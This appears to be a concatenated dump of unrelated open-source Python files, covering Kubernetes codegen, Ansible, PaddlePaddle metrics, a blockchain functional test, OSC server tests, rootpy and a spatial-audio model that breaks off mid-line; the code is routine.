# *** WARNING: this file was generated by the Kulado Kubernetes codegen tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import kulado import kulado.runtime import warnings from ... import tables, version class CronJobList(kulado.CustomResource): """ CronJobList is a collection of cron jobs. """ def __init__(self, resource_name, opts=None, items=None, metadata=None, __name__=None, __opts__=None): if __name__ is not None: warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning) opts = __opts__ if not resource_name: raise TypeError('Missing resource name argument (for URN creation)') if not isinstance(resource_name, str): raise TypeError('Expected resource name to be a string') if opts and not isinstance(opts, kulado.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') __props__ = dict() __props__['apiVersion'] = 'batch/v1beta1' __props__['kind'] = 'CronJobList' if items is None: raise TypeError('Missing required property items') __props__['items'] = items __props__['metadata'] = metadata if opts is None: opts = kulado.ResourceOptions() if opts.version is None: opts.version = version.get_version() super(CronJobList, self).__init__( "kubernetes:batch/v1beta1:CronJobList", resource_name, __props__, opts) def translate_output_property(self, prop: str) -> str: return tables._CASING_FORWARD_TABLE.get(prop) or prop def translate_input_property(self, prop: str) -> str: return tables._CASING_BACKWARD_TABLE.get(prop) or prop
py
7df9eb1fdbf3645340a1ffeb8e4a699988cd83db
import pytest from pytest_bdd import scenarios pytestmark = [ pytest.mark.bdd, pytest.mark.usefixtures('workbook', 'admin_user'), ] scenarios( 'forms.feature', 'page.feature', strict_gherkin=False, )
py
7df9ebbe6465386d6a36dd59638de04d84842b7d
#!/usr/bin/python # Copyright 2016 Yanis Guenane <[email protected]> # Author: Yanis Guenane <[email protected]> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import copy import os from ansible.module_utils.basic import * try: import yaml except ImportError: pyyaml_found = False else: pyyaml_found = True _PROPERTIES = ['type', 'size', 'digest', 'version', 'subjectAltName', 'countryName', 'stateOrProvinceName', 'localityName', 'organizationName', 'organizationUnitName', 'commonName', 'emailAddress', 'account_key_name', 'path', 'remaining_days', 'service_name', 'service_provider'] DOCUMENTATION = ''' --- module: lecm_certificate short_description: An Ansible module to manage lecm certificates in the configuration file version_added: 2.2 options: state: required: false choices: ['present', 'absent'] default: 'present' description: Wheter or not the mode should be present config: required: false description: Path of the lecm config file, if not using the default name: required: true description: Name of the global parameter path: required: true description: Path to the git repository on the local filesystem ''' EXAMPLES = ''' - name: Create a SSL certificate lecm_certificate: config: /etc/lecm.conf name: lecm.example.com - name: Remove a SSL certificate lecm_certificate: config: /etc/lecm.conf name: lecm.example.com state: absent ''' RETURN = ''' name: description: Name of the SSL certificate type: string sample: lecm.example.com path: description: Path to the git project type: string sample: /srv/git/git_superproject ''' class Certificate(object): def __init__(self, module): self.state = module.params['state'] self.config = module.params['config'] self.name = module.params['name'] self.changed = True self.type = module.params['type'] self.size = module.params['size'] self.digest = module.params['digest'] self.version = module.params['version'] self.subjectAltName = module.params['subjectAltName'] self.countryName = module.params['countryName'] self.stateOrProvinceName = module.params['stateOrProvinceName'] self.localityName = module.params['localityName'] self.organizationName = module.params['organizationName'] self.organizationUnitName = module.params['organizationUnitName'] self.commonName = module.params['commonName'] self.emailAddress = module.params['emailAddress'] self.account_key_name = module.params['account_key_name'] self.remaining_days = module.params['remaining_days'] self.service_name = module.params['service_name'] self.service_provider = module.params['service_provider'] self.path = module.params['path'] def write(self): l_certificate = {} for prop in _PROPERTIES: if getattr(self, prop): l_certificate[prop] = getattr(self, prop) try: lecm_conf = yaml.load(open(self.config, 'r')) except: lecm_conf = {} if lecm_conf is None: lecm_conf = {} certificates = {} c_certificate = None try: current_certificates = copy.deepcopy(lecm_conf['certificates']) for certificate, parameters in current_certificates.items(): if 'name' in parameters: certificate_name = parameters['name'] else: certificate_name = certificate if certificate_name != self.name: certificates[certificate_name] = parameters else: c_certificate = parameters except KeyError: pass if c_certificate == l_certificate: self.changed = False else: certificates[self.name] = l_certificate lecm_conf['certificates'] = copy.deepcopy(certificates) with open(self.config, 'w') as conf_file: conf_file.write( yaml.dump( lecm_conf, explicit_start=True, default_flow_style=False ) ) def remove(self): # Not Implemented yet pass def dump(self): return {'name': self.name, 'changed': self.changed} def main(): module = AnsibleModule( argument_spec=dict( state=dict(default='present', choices=['present', 'absent'], type='str'), config=dict(required=False, type='path', default='/etc/lecm.conf'), name=dict(type='str'), type=dict(required=False, type='str'), size=dict(required=False, type='int'), digest=dict(required=False, type='str'), version=dict(required=False, type='int'), subjectAltName=dict(required=False, type='list'), countryName=dict(required=False, type='str'), stateOrProvinceName=dict(required=False, type='str'), localityName=dict(required=False, type='str'), organizationName=dict(required=False, type='str'), organizationUnitName=dict(required=False, type='str'), commonName=dict(required=False, type='str'), emailAddress=dict(required=False, type='str'), account_key_name=dict(required=False, type='str'), path=dict(required=False, type='path'), remaining_days=dict(required=False, type='int'), service_name=dict(required=False, type='str'), service_provider=dict(required=False, default='systemd', choices=['systemd', 'sysv'], type='str'), ), ) if not pyyaml_found: module.fail_json(msg='the python PyYAML module is required') path = os.path.dirname(module.params['config']) if not os.path.isdir(path): module.fail_json(name=path, msg='Directory %s does not exist' % path) certificate = Certificate(module) if certificate.state == 'present': certificate.write() else: certificate.remove() result = certificate.dump() module.exit_json(**result) if __name__ == '__main__': main()
py
7df9ebcc0f859e97889cf999c299e8e3a450e550
#!/Users/Marisa/Sites/zwazo/venv/bin/python3 # Author: # Contact: [email protected] # Copyright: This module has been placed in the public domain. """ man.py ====== This module provides a simple command line interface that uses the man page writer to output from ReStructuredText source. """ import locale try: locale.setlocale(locale.LC_ALL, '') except: pass from docutils.core import publish_cmdline, default_description from docutils.writers import manpage description = ("Generates plain unix manual documents. " + default_description) publish_cmdline(writer=manpage.Writer(), description=description)
py
7df9ec3605775a499ccc04182eeeb6f0c7dd6261
import numpy as np import paddle import paddle.nn as nn from paddle.metric import Metric class RecallAtK(Metric): """ Recall@K is the fraction of relevant results among the retrieved Top K results, using to evaluate the performance of Dialogue Response Selection. Noted that this class manages the Recall@K score only for binary classification task. """ def __init__(self, name='Recall@K', *args, **kwargs): super(RecallAtK, self).__init__(*args, **kwargs) self._name = name self.softmax = nn.Softmax() self.reset() def reset(self): """ Resets all of the metric state. """ self.num_sampls = 0 self.p_at_1_in_10 = 0.0 self.p_at_2_in_10 = 0.0 self.p_at_5_in_10 = 0.0 def get_p_at_n_in_m(self, data, n, m, idx): """ calculate precision in recall n """ pos_score = data[idx][0] curr = data[idx:idx + m] curr = sorted(curr, key=lambda x: x[0], reverse=True) if curr[n - 1][0] <= pos_score: return 1 return 0 def update(self, logits, labels): """ Update the states based on the current mini-batch prediction results. Args: logits (Tensor): The predicted value is a Tensor with shape [batch_size, 2] and type float32 or float64. labels (Tensor): The ground truth value is a 2D Tensor, its shape is [batch_size, 1] and type is int64. """ probs = self.softmax(logits) probs = probs.numpy() labels = labels.numpy() assert probs.shape[0] == labels.shape[0] data = [] for prob, label in zip(probs, labels): data.append((prob[1], label)) assert len(data) % 10 == 0 length = int(len(data) / 10) self.num_sampls += length for i in range(length): idx = i * 10 assert data[idx][1] == 1 self.p_at_1_in_10 += self.get_p_at_n_in_m(data, 1, 10, idx) self.p_at_2_in_10 += self.get_p_at_n_in_m(data, 2, 10, idx) self.p_at_5_in_10 += self.get_p_at_n_in_m(data, 5, 10, idx) def accumulate(self): """ Calculate the final Recall@K. Returns: A list with scaler float: results of the calculated R1@K, R2@K, R5@K. """ metrics_out = [ self.p_at_1_in_10 / self.num_sampls, self.p_at_2_in_10 / self.num_sampls, self.p_at_5_in_10 / self.num_sampls ] return metrics_out def name(self): """ Returns metric name """ return self._name class JointAccuracy(Metric): """ The joint accuracy rate is used to evaluate the performance of multi-turn Dialogue State Tracking. For each turn, if and only if all state in state_list are correctly predicted, the dialog state prediction is considered correct. And the joint accuracy rate is equal to 1, otherwise it is equal to 0. """ def __init__(self, name='JointAccuracy', *args, **kwargs): super(JointAccuracy, self).__init__(*args, **kwargs) self._name = name self.sigmoid = nn.Sigmoid() self.reset() def reset(self): """ Resets all of the metric state. """ self.num_samples = 0 self.correct_joint = 0.0 def update(self, logits, labels): """ Update the states based on the current mini-batch prediction results. Args: logits (Tensor): The predicted value is a Tensor with shape [batch_size, num_classes] and type float32 or float64. labels (Tensor): The ground truth value is a 2D Tensor, its shape is [batch_size, num_classes] and type is int64. """ probs = self.sigmoid(logits) probs = probs.numpy() labels = labels.numpy() assert probs.shape[0] == labels.shape[0] assert probs.shape[1] == labels.shape[1] for i in range(probs.shape[0]): pred, refer = [], [] for j in range(probs.shape[1]): if probs[i][j] >= 0.5: pred.append(j) if labels[i][j] == 1: refer.append(j) if not pred: pred = [np.argmax(probs[i])] if pred == refer: self.correct_joint += 1 self.num_samples += probs.shape[0] def accumulate(self): """ Calculate the final JointAccuracy. Returns: A scaler float: results of the calculated JointAccuracy. """ joint_acc = self.correct_joint / self.num_samples return joint_acc def name(self): """ Returns metric name """ return self._name class F1Score(Metric): """ F1-score is the harmonic mean of precision and recall. Micro-averaging is to create a global confusion matrix for all examples, and then calculate the F1-score. This class is using to evaluate the performance of Dialogue Slot Filling. """ def __init__(self, name='F1Score', *args, **kwargs): super(F1Score, self).__init__(*args, **kwargs) self._name = name self.reset() def reset(self): """ Resets all of the metric state. """ self.tp = {} self.fn = {} self.fp = {} def update(self, logits, labels): """ Update the states based on the current mini-batch prediction results. Args: logits (Tensor): The predicted value is a Tensor with shape [batch_size, seq_len, num_classes] and type float32 or float64. labels (Tensor): The ground truth value is a 2D Tensor, its shape is [batch_size, seq_len] and type is int64. """ probs = paddle.argmax(logits, axis=-1) probs = probs.numpy() labels = labels.numpy() assert probs.shape[0] == labels.shape[0] assert probs.shape[1] == labels.shape[1] for i in range(probs.shape[0]): start, end = 1, probs.shape[1] while end > start: if labels[i][end - 1] != 0: break end -= 1 prob, label = probs[i][start:end], labels[i][start:end] for y_pred, y in zip(prob, label): if y_pred == y: self.tp[y] = self.tp.get(y, 0) + 1 else: self.fp[y_pred] = self.fp.get(y_pred, 0) + 1 self.fn[y] = self.fn.get(y, 0) + 1 def accumulate(self): """ Calculate the final micro F1 score. Returns: A scaler float: results of the calculated micro F1 score. """ tp_total = sum(self.tp.values()) fn_total = sum(self.fn.values()) fp_total = sum(self.fp.values()) p_total = float(tp_total) / (tp_total + fp_total) r_total = float(tp_total) / (tp_total + fn_total) if p_total + r_total == 0: return 0 f1_micro = 2 * p_total * r_total / (p_total + r_total) return f1_micro def name(self): """ Returns metric name """ return self._name
py
7df9ece02d276513adf05e134a7f57cbda0d14f8
#!/usr/bin/env python3 # Copyright (c) 2017-2019 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file LICENSE or http://www.opensource.org/licenses/mit-license.php. """An example functional test The module-level docstring should include a high-level description of what the test is doing. It's the first thing people see when they open the file and should give the reader information about *what* the test is testing and *how* it's being tested """ # Imports should be in PEP8 ordering (std library first, then third party # libraries then local imports). from collections import defaultdict # Avoid wildcard * imports from test_framework.blocktools import (create_block, create_coinbase) from test_framework.messages import CInv from test_framework.mininode import ( P2PInterface, mininode_lock, msg_block, msg_getdata, ) from test_framework.test_framework import DefiTestFramework from test_framework.util import ( assert_equal, connect_nodes, wait_until, ) # P2PInterface is a class containing callbacks to be executed when a P2P # message is received from the node-under-test. Subclass P2PInterface and # override the on_*() methods if you need custom behaviour. class BaseNode(P2PInterface): def __init__(self): """Initialize the P2PInterface Used to initialize custom properties for the Node that aren't included by default in the base class. Be aware that the P2PInterface base class already stores a counter for each P2P message type and the last received message of each type, which should be sufficient for the needs of most tests. Call super().__init__() first for standard initialization and then initialize custom properties.""" super().__init__() # Stores a dictionary of all blocks received self.block_receive_map = defaultdict(int) def on_block(self, message): """Override the standard on_block callback Store the hash of a received block in the dictionary.""" message.block.calc_sha256() self.block_receive_map[message.block.sha256] += 1 def on_inv(self, message): """Override the standard on_inv callback""" pass def custom_function(): """Do some custom behaviour If this function is more generally useful for other tests, consider moving it to a module in test_framework.""" # self.log.info("running custom_function") # Oops! Can't run self.log outside the DefiTestFramework pass class ExampleTest(DefiTestFramework): # Each functional test is a subclass of the DefiTestFramework class. # Override the set_test_params(), skip_test_if_missing_module(), add_options(), setup_chain(), setup_network() # and setup_nodes() methods to customize the test setup as required. def set_test_params(self): """Override test parameters for your individual test. This method must be overridden and num_nodes must be explicitly set.""" self.setup_clean_chain = True self.num_nodes = 3 # Use self.extra_args to change command-line arguments for the nodes self.extra_args = [[], ["-logips"], []] # self.log.info("I've finished set_test_params") # Oops! Can't run self.log before run_test() # Use skip_test_if_missing_module() to skip the test if your test requires certain modules to be present. # This test uses generate which requires wallet to be compiled def skip_test_if_missing_module(self): self.skip_if_no_wallet() # Use add_options() to add specific command-line options for your test. # In practice this is not used very much, since the tests are mostly written # to be run in automated environments without command-line options. # def add_options() # pass # Use setup_chain() to customize the node data directories. In practice # this is not used very much since the default behaviour is almost always # fine # def setup_chain(): # pass def setup_network(self): """Setup the test network topology Often you won't need to override this, since the standard network topology (linear: node0 <-> node1 <-> node2 <-> ...) is fine for most tests. If you do override this method, remember to start the nodes, assign them to self.nodes, connect them and then sync.""" self.setup_nodes() # In this test, we're not connecting node2 to node0 or node1. Calls to # sync_all() should not include node2, since we're not expecting it to # sync. connect_nodes(self.nodes[0], 1) self.sync_all(self.nodes[0:2]) # Use setup_nodes() to customize the node start behaviour (for example if # you don't want to start all nodes at the start of the test). # def setup_nodes(): # pass def custom_method(self): """Do some custom behaviour for this test Define it in a method here because you're going to use it repeatedly. If you think it's useful in general, consider moving it to the base DefiTestFramework class so other tests can use it.""" self.log.info("Running custom_method") def run_test(self): """Main test logic""" # Create P2P connections will wait for a verack to make sure the connection is fully up self.nodes[0].add_p2p_connection(BaseNode()) # Generating a block on one of the nodes will get us out of IBD blocks = [int(self.nodes[0].generate(nblocks=1)[0], 16)] self.sync_all(self.nodes[0:2]) # Notice above how we called an RPC by calling a method with the same # name on the node object. Notice also how we used a keyword argument # to specify a named RPC argument. Neither of those are defined on the # node object. Instead there's some __getattr__() magic going on under # the covers to dispatch unrecognised attribute calls to the RPC # interface. # Logs are nice. Do plenty of them. They can be used in place of comments for # breaking the test into sub-sections. self.log.info("Starting test!") self.log.info("Calling a custom function") custom_function() self.log.info("Calling a custom method") self.custom_method() self.log.info("Create some blocks") self.tip = int(self.nodes[0].getbestblockhash(), 16) self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1 height = self.nodes[0].getblockcount() for i in range(10): # Use the mininode and blocktools functionality to manually build a block # Calling the generate() rpc is easier, but this allows us to exactly # control the blocks and transactions. block = create_block(self.tip, create_coinbase(height+1), self.block_time) block.solve() block_message = msg_block(block) # Send message is used to send a P2P message to the node over our P2PInterface self.nodes[0].p2p.send_message(block_message) self.tip = block.sha256 blocks.append(self.tip) self.block_time += 1 height += 1 self.log.info("Wait for node1 to reach current tip (height 11) using RPC") self.nodes[1].waitforblockheight(11) self.log.info("Connect node2 and node1") connect_nodes(self.nodes[1], 2) self.log.info("Wait for node2 to receive all the blocks from node1") self.sync_all() self.log.info("Add P2P connection to node2") self.nodes[0].disconnect_p2ps() self.nodes[2].add_p2p_connection(BaseNode()) self.log.info("Test that node2 propagates all the blocks to us") getdata_request = msg_getdata() for block in blocks: getdata_request.inv.append(CInv(2, block)) self.nodes[2].p2p.send_message(getdata_request) # wait_until() will loop until a predicate condition is met. Use it to test properties of the # P2PInterface objects. wait_until(lambda: sorted(blocks) == sorted(list(self.nodes[2].p2p.block_receive_map.keys())), timeout=5, lock=mininode_lock) self.log.info("Check that each block was received only once") # The network thread uses a global lock on data access to the P2PConnection objects when sending and receiving # messages. The test thread should acquire the global lock before accessing any P2PConnection data to avoid locking # and synchronization issues. Note wait_until() acquires this global lock when testing the predicate. with mininode_lock: for block in self.nodes[2].p2p.block_receive_map.values(): assert_equal(block, 1) if __name__ == '__main__': ExampleTest().main()
py
7df9ed3eae0586aa8b93e01c3db046cbc0ecf51c
from frappe import _ def get_data(): return [ { "label": _("Purchasing"), "icon": "fa fa-star", "items": [ { "type": "doctype", "name": "Material Request", "description": _("Request for purchase."), }, { "type": "doctype", "name": "Request for Quotation", "description": _("Request for quotation."), }, { "type": "doctype", "name": "Supplier Quotation", "description": _("Quotations received from Suppliers."), }, { "type": "doctype", "name": "Purchase Order", "description": _("Purchase Orders given to Suppliers."), }, { "type": "doctype", "name": "Order Tracking", "description": _("Track orders from Suppliers."), }, { "type": "doctype", "name": "Product Quality Inspection", "label": _("Order Inspection") }, { "type": "doctype", "name": "Purchase Receipt", }, ] }, { "label": _("Stock Management"), "items": [ { "type": "doctype", "name": "Stock Entry", }, { "type": "doctype", "name": "Stock Transport", }, { "type": "report", "is_query_report": True, "name": "Stock Ledger", "doctype": "Stock Ledger Entry", }, ] }, { "label": _("Supplier"), "items": [ { "type": "doctype", "name": "Supplier", "description": _("Supplier database."), }, { "type": "doctype", "name": "Supplier Type", "description": _("Supplier Type master.") }, { "type": "doctype", "name": "Project", "label": _("Projects"), "description": _("Supplier Type master.") }, ] }, { "label": _("Items and Pricing"), "items": [ { "type": "doctype", "name": "Item", }, { "type": "doctype", "name": "Product Bundle", }, { "type": "doctype", "name": "Item Price", "route": "Report/Item Price", }, { "type": "doctype", "name": "Serial No", }, { "type": "doctype", "name": "Past Serial No", "description": _("Past Serial No."), } ] }, { "label": _("Purchase Reports"), "icon": "fa fa-list", "items": [ { "type": "report", "is_query_report": True, "name": "Items To Be Requested" }, { "type": "report", "is_query_report": True, "name": "Reordering Items" }, { "type": "report", "is_query_report": True, "name": "Pending Ordered Items" }, { "type": "report", "is_query_report": True, "name": "Purchase History" }, { "type": "report", "is_query_report": True, "name": "Pending Requests" }, { "type": "report", "is_query_report": True, "name": "Shipment Tracking", "doctype": "Order Tracking", }, { "type": "report", "is_query_report": True, "name": "Costing Report", "doctype": "Landed Cost Voucher", }, { "type": "report", "is_query_report": True, "name": "Supplier Contacts", "label": "Supplier Contacts", "doctype": "Address", "route_options": { "party_type": "Supplier" } }, ] }, { "label": _("Stock Reports"), "items": [ { "type": "report", "is_query_report": True, "name": "Stock Balance", "doctype": "Stock Ledger Entry" }, { "type": "report", "is_query_report": True, "name": "Stock Projected Qty", "doctype": "Item", }, { "type": "page", "name": "stock-balance", "label": _("Stock Summary") }, { "type": "report", "is_query_report": True, "name": "Stock Ageing", "doctype": "Item", }, { "type": "report", "is_query_report": True, "name": "Ordered Items To Be Delivered", "doctype": "Delivery Note" }, { "type": "report", "name": "Item Shortage Report", "route": "Report/Bin/Item Shortage Report", "doctype": "Purchase Receipt" }, { "type": "report", "is_query_report": True, "name": "Requested Items To Be Transferred", "doctype": "Material Request" }, { "type": "report", "is_query_report": True, "name": "Itemwise Recommended Reorder Level", "doctype": "Item" }, ] }, { "label": _("Purchase Analytics"), "icon": "fa fa-table", "items": [ { "type": "page", "name": "purchase-analytics", "label": _("Purchase Analytics"), "icon": "fa fa-bar-chart", }, { "type": "report", "is_query_report": True, "name": "Purchase Order Trends", "doctype": "Purchase Order" }, { "type": "report", "is_query_report": True, "name": "Purchase Receipt Trends", "doctype": "Purchase Receipt" }, ] }, { "label": _("Stock Analytics"), "icon": "fa fa-table", "items": [ { "type": "page", "name": "stock-analytics", "label": _("Stock Analytics"), "icon": "fa fa-bar-chart" }, { "type": "doctype", "name": "Bin Setup", "description": _("Bin Setup for warehouse") }, ] }, ]
py
7df9ed8972cbad5bb2c25911600cd50a8f4ea353
#----------------------------------------------------------------------------- # Copyright (c) 2013-2017, PyInstaller Development Team. # # Distributed under the terms of the GNU General Public License with exception # for distributing bootloader. # # The full license is in the file COPYING.txt, distributed with this software. #----------------------------------------------------------------------------- """ Hook for http://pypi.python.org/pypi/pytest/ """ import pytest hiddenimports = pytest.freeze_includes()
py
7df9ee8ed3a058393cbfa077dea9b57bc07615ac
import unittest try: import unittest.mock as mock except ImportError: import mock from pythonosc import dispatcher from pythonosc import osc_server _SIMPLE_PARAM_INT_MSG = ( b"/SYNC\x00\x00\x00" b",i\x00\x00" b"\x00\x00\x00\x04") # Regressiont test for a datagram that should NOT be stripped, ever... _SIMPLE_PARAM_INT_9 = b'/debug\x00\x00,i\x00\x00\x00\x00\x00\t' _SIMPLE_MSG_NO_PARAMS = b"/SYNC\x00\x00\x00" class TestOscServer(unittest.TestCase): def test_is_valid_request(self): self.assertTrue( osc_server._is_valid_request([b'#bundle\x00foobar'])) self.assertTrue( osc_server._is_valid_request([b'/address/1/2/3,foobar'])) self.assertFalse( osc_server._is_valid_request([b''])) class TestUDPHandler(unittest.TestCase): def setUp(self): super(TestUDPHandler, self).setUp() self.dispatcher = dispatcher.Dispatcher() # We do not want to create real UDP connections during unit tests. self.server = mock.Mock(spec=osc_server.BlockingOSCUDPServer) # Need to attach property mocks to types, not objects... weird. type(self.server).dispatcher = mock.PropertyMock( return_value=self.dispatcher) self.client_address = ("127.0.0.1", 8080) def test_no_match(self): mock_meth = mock.MagicMock() self.dispatcher.map("/foobar", mock_meth) osc_server._UDPHandler( [_SIMPLE_PARAM_INT_MSG, None], self.client_address, self.server) self.assertFalse(mock_meth.called) def test_match_with_args(self): mock_meth = mock.MagicMock() self.dispatcher.map("/SYNC", mock_meth, 1, 2, 3) osc_server._UDPHandler( [_SIMPLE_PARAM_INT_MSG, None], self.client_address, self.server) mock_meth.assert_called_with("/SYNC", [1, 2, 3], 4) def test_match_int9(self): mock_meth = mock.MagicMock() self.dispatcher.map("/debug", mock_meth) osc_server._UDPHandler( [_SIMPLE_PARAM_INT_9, None], self.client_address, self.server) self.assertTrue(mock_meth.called) mock_meth.assert_called_with("/debug", 9) def test_match_without_args(self): mock_meth = mock.MagicMock() self.dispatcher.map("/SYNC", mock_meth) osc_server._UDPHandler( [_SIMPLE_MSG_NO_PARAMS, None], self.client_address, self.server) mock_meth.assert_called_with("/SYNC") def test_match_default_handler(self): mock_meth = mock.MagicMock() self.dispatcher.set_default_handler(mock_meth) osc_server._UDPHandler( [_SIMPLE_MSG_NO_PARAMS, None], self.client_address, self.server) mock_meth.assert_called_with("/SYNC") if __name__ == "__main__": unittest.main()
py
7df9efdd3a504edf5c07198256f201539aa0fefd
import logging import sys import importlib from pathlib import Path from typing import Union from powerstrip.exceptions import ModuleException from powerstrip.utils.utils import ensure_path # prepare logger log = logging.getLogger(__name__) def load_module(module_name: str, path: Union[str, Path]): """ load module by name from given directory :param module_name: name of the module :type module_name: str :param path: complete path of the python file :type path: Union[str, Path] :raises ModuleException: if file does not exist or module cannot be loaded """ assert isinstance(module_name, str) assert isinstance(path, (str, Path)) # ensure that directory is a Path path = ensure_path(path) if not path.exists(): # not a path raise ModuleException( f"The file '{path}' does not exist! Abort." ) # get modules spec log.debug( f"getting specs for module '{module_name}' in " f"'{path.as_posix()}'..." ) spec = importlib.util.spec_from_file_location( name=module_name, location=path.as_posix() ) if spec is None: # spec not found raise ModuleException( f"Could not get specs for module '{module_name}' " f"in file '{path}'! Abort." ) if spec.name not in sys.modules: # get module from spec, if not yet loaded mod = importlib.util.module_from_spec(spec) sys.modules[spec.name] = mod # load the module spec.loader.exec_module(mod)
py
7df9f22c66a3fb568d31e4114b914503bf86323a
from random import gauss from rootpy.io import root_open from rootpy.tree import Tree, TreeModel, FloatCol, IntCol from rootpy.tree.model import TreeModelMeta from rootpy import stl from rootpy.vector import LorentzVector from rootpy.tree.treetypes import FloatArrayCol import tempfile class Event(TreeModel): # properties of particle "a" a_x = FloatCol() a_y = FloatCol() a_z = FloatCol() # properties of particle "b" b_x = FloatCol() b_y = FloatCol() b_z = FloatCol() # a collection of particles col_x = stl.vector("float") col_y = stl.vector("float") col_z = stl.vector("float") col_n = IntCol() # a TLorentzVector p = LorentzVector i = IntCol() # Make two files, each with a Tree called "test" print "Creating test tree in chaintest1.root" tmp_dir = tempfile.mkdtemp() f = root_open(tmp_dir + "/chaintest1.root", "recreate") branches = { 'x': FloatCol(), 'y': FloatCol(), 'z': FloatCol(), 'i': FloatCol(), 'vi': stl.vector('float'), 'vx': FloatArrayCol(4), 'vy': stl.vector('float'), } # print branches MyTreeModel = TreeModelMeta('MyTreeModel', (TreeModel,), branches) tree = Tree("test", model=MyTreeModel) # tree.create_branches(branches) for i in xrange(10000): tree.x = gauss(.5, 1.) tree.y = gauss(.3, 2.) tree.z = gauss(13., 42.) tree.i = i for vi in range(4): tree.vi.push_back(vi**2) tree.vy.push_back(vi**3) tree.vx[vi] = vi**2 tree.fill(reset=True) tree.write() f.close() # from random import randint # tree = Tree("test", model=Event) # # # fill the tree # for i in xrange(10): # tree.a_x = gauss(.5, 1.) # tree.a_y = gauss(.3, 2.) # tree.a_z = gauss(13., 42.) # # tree.b_x = gauss(.5, 1.) # tree.b_y = gauss(.3, 2.) # tree.b_z = gauss(13., 42.) # # n = randint(1, 10) # for j in xrange(n): # tree.col_x.push_back(gauss(.5, 1.)) # tree.col_y.push_back(gauss(.3, 2.)) # tree.col_z.push_back(gauss(13., 42.)) # tree.col_n = n # # tree.p.SetPtEtaPhiM(gauss(.5, 1.), # gauss(.5, 1.), # gauss(.5, 1.), # gauss(.5, 1.)) # # tree.i = i # tree.fill(reset=True) # tree.write() # # f.close()
py
7df9f276d27fb051fac868d590a5ca207393538c
import numpy as np import tensorflow as tf import pyutils.tflib.wrappers as tfw from pyutils.tflib.models.image.resnet import ResNet18 from collections import OrderedDict import myutils from definitions import * class SptAudioGenParams: def __init__(self, sep_num_tracks=NUM_SEP_TRACKS_DEF, ctx_feats_fc_units=CTX_FEATS_FCUNITS_DEF, loc_fc_units=LOC_FCUNITS_DEF, sep_freq_mask_fc_units=SEP_FREQ_MASK_FCUNITS_DEF, sep_fft_window=SEP_FFT_WINDOW_DEF): self.sep_num_tracks = sep_num_tracks self.ctx_feats_fc_units = ctx_feats_fc_units self.loc_fc_units = loc_fc_units self.sep_freq_mask_fc_units = sep_freq_mask_fc_units self.sep_fft_window = sep_fft_window class SptAudioGen(object): def __init__(self, ambi_order, audio_rate=48000, video_rate=10, context=1., sample_duration=0.1, encoders=None, separation='none', params=SptAudioGenParams()): assert float(audio_rate)/video_rate == int(audio_rate)/int(video_rate) self.ambi_order = ambi_order self.num_ambi_channels = sum([2*i+1 for i in range(ambi_order+1)]) self.snd_rate, self.vid_rate = audio_rate, video_rate self.context, self.duration = context, sample_duration self.snd_contx = int(context * audio_rate) self.snd_dur = int(sample_duration * audio_rate) self.snd_size = self.snd_contx + self.snd_dur - 1 assert self.snd_rate % self.vid_rate == 0 if encoders is None: encoders = [AUDIO, VIDEO, FLOW] assert isinstance(encoders, list) assert all([e in ENCODERS for e in encoders]) self.encoders = encoders self.separation = separation self.params = params self.model = None self.deploy = None self.solver = None self.ends = OrderedDict() self.init_ops = [] self.loc_channels = None self.sep_channels = None self.wind_size = int(self.params.sep_fft_window * self.snd_rate) self.wind_size = int(2**np.round(np.log2(self.wind_size))) @staticmethod def _stft_mse_ops(gt, pred, window, overlap): with tf.variable_scope('stft_diff'): with tf.variable_scope('stft_gt'): # stft_gt = myutils.stft(tf.transpose(gt, (0, 2, 1)), window, overlap) stft_gt = myutils.stft_for_loss(gt, window, overlap) with tf.variable_scope('stft_pred'): # stft_pred = myutils.stft(tf.transpose(pred, (0, 2, 1)), window, overlap) stft_pred = myutils.stft_for_loss(pred, window, overlap) with tf.variable_scope('mse'): stft_diff = tf.abs(stft_gt-stft_pred) mse = tf.reduce_mean(tf.reduce_mean(stft_diff**2, axis=3), axis=2) return mse @staticmethod def _lsd_ops(gt, pred, window, overlap): EPS = 1e-2 with tf.variable_scope('lsd'): with tf.variable_scope('stft_gt'): stft_gt = myutils.stft(tf.transpose(gt, (0, 2, 1)), window, overlap) with tf.variable_scope('stft_pred'): stft_pred = myutils.stft(tf.transpose(pred, (0, 2, 1)), window, overlap) with tf.variable_scope('lsd'): def power_spect(x): return 10 * tf.log(tf.abs(x)+EPS) / tf.log(10.) log_spec_diff = (power_spect(stft_gt) - power_spect(stft_pred)) lsd_t = tf.sqrt(tf.reduce_mean(log_spec_diff**2, axis=3)) lsd = tf.reduce_mean(lsd_t, axis=2) return lsd @staticmethod def _temporal_mse_ops(gt, pred): with tf.variable_scope('mse'): return tf.reduce_mean((gt - pred)**2, axis=1) @staticmethod def _temporal_snr_ops(gt, pred): EPS = 1e-1 with tf.variable_scope('snr'): Psignal = tf.reduce_sum(gt**2, axis=1) Pnoise = tf.reduce_sum((gt-pred)**2, axis=1) snr = 10. * tf.log((Psignal+EPS)/(Pnoise+EPS)) / tf.log(10.) return snr def evaluation_ops(self, preds_t, targets_t, w_t, mask_channels=None): print('\n Metrics') print(' * {:15s} | {:20s} | {:10s}'.format('Prediction', str(preds_t.get_shape()), str(preds_t.dtype))) print(' * {:15s} | {:20s} | {:10s}'.format('Target', str(targets_t.get_shape()), str(targets_t.dtype))) print(' * {:15s} | {:20s} | {:10s}'.format('Channel mask', str(mask_channels.get_shape()), str(mask_channels.dtype))) if mask_channels is None: batch_size, _, n_channels = preds_t.get_shape() mask_channels = tf.ones((batch_size, n_channels)) num_masked = tf.reduce_sum(mask_channels, axis=0) num_masked = tf.maximum(num_masked, 1) metrics = OrderedDict() window = int(FFT_WINDOW * self.snd_rate) overlap = FFT_OVERLAP_R stft_dist_ps = self._stft_mse_ops(targets_t, preds_t, window, overlap) stft_dist = 